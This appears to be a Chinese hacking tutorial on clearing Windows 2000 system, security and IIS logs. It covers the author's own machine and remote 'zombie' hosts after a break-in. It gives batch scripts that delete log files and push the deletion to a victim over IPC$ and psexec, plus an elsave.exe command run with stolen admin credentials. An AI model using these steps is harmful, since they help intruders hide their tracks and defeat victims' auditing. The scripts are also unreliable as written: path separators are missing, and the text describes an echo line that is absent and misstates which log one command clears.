徹底清除本地和遠(yuǎn)程系統(tǒng)日志文件

什么是日志文件？它是一些文件系統(tǒng)集合，依靠建立起的各種數(shù)據(jù)的日志文件而存在。在任何系統(tǒng)發(fā)生崩潰或需要重新啟動(dòng)時(shí)，數(shù)據(jù)就遵從日志文件中的信息記錄原封不動(dòng)進(jìn)行恢復(fù)。日志對(duì)于系統(tǒng)安全的作用是顯而易見(jiàn)的，無(wú)論是網(wǎng)絡(luò)管理員還是 黑客都非常重視日志，一個(gè)有經(jīng)驗(yàn)的管理員往往能夠迅速通過(guò)日志了解到系統(tǒng)的安全性能，而一個(gè)聰明的黑客會(huì)在入侵成功后迅速清除掉對(duì)自己不利的日志。無(wú)論是攻還是防，日志的重要性由此可見(jiàn)。下面我們就來(lái)簡(jiǎn)單討論一下日志文件的清除方法。

　　一、日志文件的位置

　　Windows 2000的系統(tǒng)日志文件有應(yīng)用程序日志，安全日志、系統(tǒng)日志、DNS服務(wù)器日志等等，應(yīng)用程序日志、安全日志、系統(tǒng)日志、DNS日志默認(rèn)位置：%systemroot%system32config。


　　安全日志文件：%systemroot%system32configSecEvent.EVT

　　系統(tǒng)日志文件：%systemroot%system32configSysEvent.EVT

　　應(yīng)用程序日志文件：%systemroot%system32configAppEvent.EVT


　　有的管理員很可能將這些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目錄。

　　二、清除自己電腦中的日志

　　如果你要清除自己電腦中的日志，可以用管理員的身份來(lái)登錄Windows，然后在“控制面板”中進(jìn)入“管理工具”，再雙擊里面的“事件查看器”。打開(kāi)后我們就可以在這里清除日志文件了，里面有應(yīng)用程序、安全和系統(tǒng)日志文件。舉個(gè)例子，比方說(shuō)你想清除安全日志，可以右鍵點(diǎn)擊“安全日志”，在彈出的菜單中選擇“屬性”。接下來(lái)在彈出的對(duì)話框中，點(diǎn)擊下面“清除日志”按鈕就可以清除了，如果你想以后再來(lái)清除這些日志的話，可以將“按需要改寫(xiě)尺寸”，這樣就可以在達(dá)到最大日志尺寸時(shí)進(jìn)行改寫(xiě)事件了，不會(huì)提示你清除日志。

　　三、清除遠(yuǎn)程主機(jī)上的日志

　　大多數(shù)情況下，IIS的日志會(huì)忠實(shí)地記錄它接收到的任何請(qǐng)求（也有特殊的不被IIS記錄的攻擊），一個(gè)優(yōu)秀的系統(tǒng)管理員會(huì)利用這點(diǎn)來(lái)發(fā)現(xiàn)入侵的企圖，保護(hù)自己的系統(tǒng)。所以如果你是黑客，入侵系統(tǒng)成功后第一件事便是清除日志，擦去自己的形跡，這時(shí)可以用以下兩個(gè)辦法：一是自己編寫(xiě)批處理文件來(lái)解決，編寫(xiě)一個(gè)能清除日志的批處理非常簡(jiǎn)單，方法是：新建一個(gè)具有如下內(nèi)容的批處理文件：
@del c:winntsystem32logfiles*.*

　　@del c:winntsystem32config*.evt

　　@del c:winntsystem32dtclog*.*

　　@del c:winntsystem32*.log

　　@del c:winntsystem32*.txt

　　@del c:winnt*.txt

　　@del c:winnt*.log

　　@del c:del.bat


　　把上面的內(nèi)容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令，在它的前面加上“@”前綴字符，表示執(zhí)行時(shí)本行在命令行或DOS里面不顯示，另外del命令大家一定清楚吧？它是刪除文件命令。


　　接下來(lái)再新建一個(gè)批處理文件，內(nèi)容如下：

　　@copy del.bat %1c$

　　@echo 向肉雞復(fù)制本機(jī)的del.bat……OK

　　@psexec %1 c:del.bat

　　@echo 在肉雞上運(yùn)行del.bat，清除日志文件……OK

　　保存為clean.bat即可，假設(shè)已經(jīng)與肉雞進(jìn)行了IPC連接，然后在CMD下輸入：clean.bat 肉雞IP，即可清除肉雞上的日志文件。

　　清除日志的另外一個(gè)方法是借助第三方軟件，如著名黑客軟件流光的開(kāi)發(fā)者黑客小榕的elsave.exe，就是是一款可以遠(yuǎn)程清除系統(tǒng)日志、應(yīng)用程序日志、安全日志的軟件，大家可以在網(wǎng)上下載到。elsave.exe使用起來(lái)很簡(jiǎn)單，首先利用獲得的管理員賬號(hào)與對(duì)方建立IPC會(huì)話：net use ip pass /user: user，然后在命令行下執(zhí)行如下命令：elsave -s ip -l application -C，這樣就刪除了安全日志。